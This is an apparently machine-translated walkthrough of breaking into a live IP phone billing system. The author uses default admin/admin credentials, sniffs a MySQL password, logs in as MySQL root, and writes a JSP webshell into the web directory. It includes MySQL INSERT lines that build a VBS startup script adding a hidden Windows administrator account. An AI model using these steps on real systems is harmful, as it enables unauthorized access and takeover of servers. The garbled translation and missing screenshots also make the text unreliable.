Intrusion detection in the case of mysql connection

Www.2cto.com: I am exhausted by human bypass. The author should pay attention to human bypass.

In the intrusion detection process of an IP Phone billing system, how can we obtain the privilege of webshell in the case of mysql's external connection.

The website is like this.





The website architecture is tomcat-apache.

Log in with the default account and password admin/admin.



I looked at it.

The access test button is available in engine management. It is a mysql database. Click access test and capture packets to obtain the plaintext of the password with an asterisk.





It is executed in get mode.

Obtain the Mysql database account password eccom/eccom

Check whether port 3306 of the target website is enabled.





It indicates that it is enabled. You can try the connection on the KALI system.




Accessible

Check which databases are available



We can see that the mysql database has a high permission to show the database, which may be the same as the root database. Then we can get the root password first and look comfortable.





After the Root password is decrypted, it is still root. Log On As root.



There are three methods to escalate permissions: udf, Trojan, and startup. I didn't know how to create a folder for the udf at the beginning. So I tried to add the user's vbs in the startup Item,
Mysql> insert into a values ("set wshshell = createobject (" "wscript. shell "")");
Mysql> insert into a values ("a = wshshell. run (" "cmd.exe/c net user xiaowai 123qwe! @ #/Add "", 0 )");
Mysql> insert into a values ("B = wshshell. run (" "cmd.exe/c net localgroup Administrators xiaowai/add" ", 0 )");
But I don't know how to restart this server. If a policy is configured for an overflow attack, the server will be shut down. If you are afraid to break the system down, you will give up and choose to find an absolute path to write a Trojan. The procedure is as follows. I first searched for the path. The path found at the beginning was incorrect, and the result wasted a lot of time.



The path here is incorrect. As a result, all Trojans are written in other folders.
During the process of finding the correct path, I tried ftp to raise the right. ftp can be directly connected and has the write permission.





However, you cannot execute commands, so you quit ftp.
Back to business



Scan a log folder to which the directory is scanned




The absolute path is found.
Start writing horses.



The trojan address is



Opening is blank, so the write is successful.
Found a jsp one-sentence Trojan Client



Click to submit



After obtaining webshell, it is easy to escalate permissions. jsp Trojans generally have high permissions.










End.

The account has been deleted and webshell has been deleted. No worries.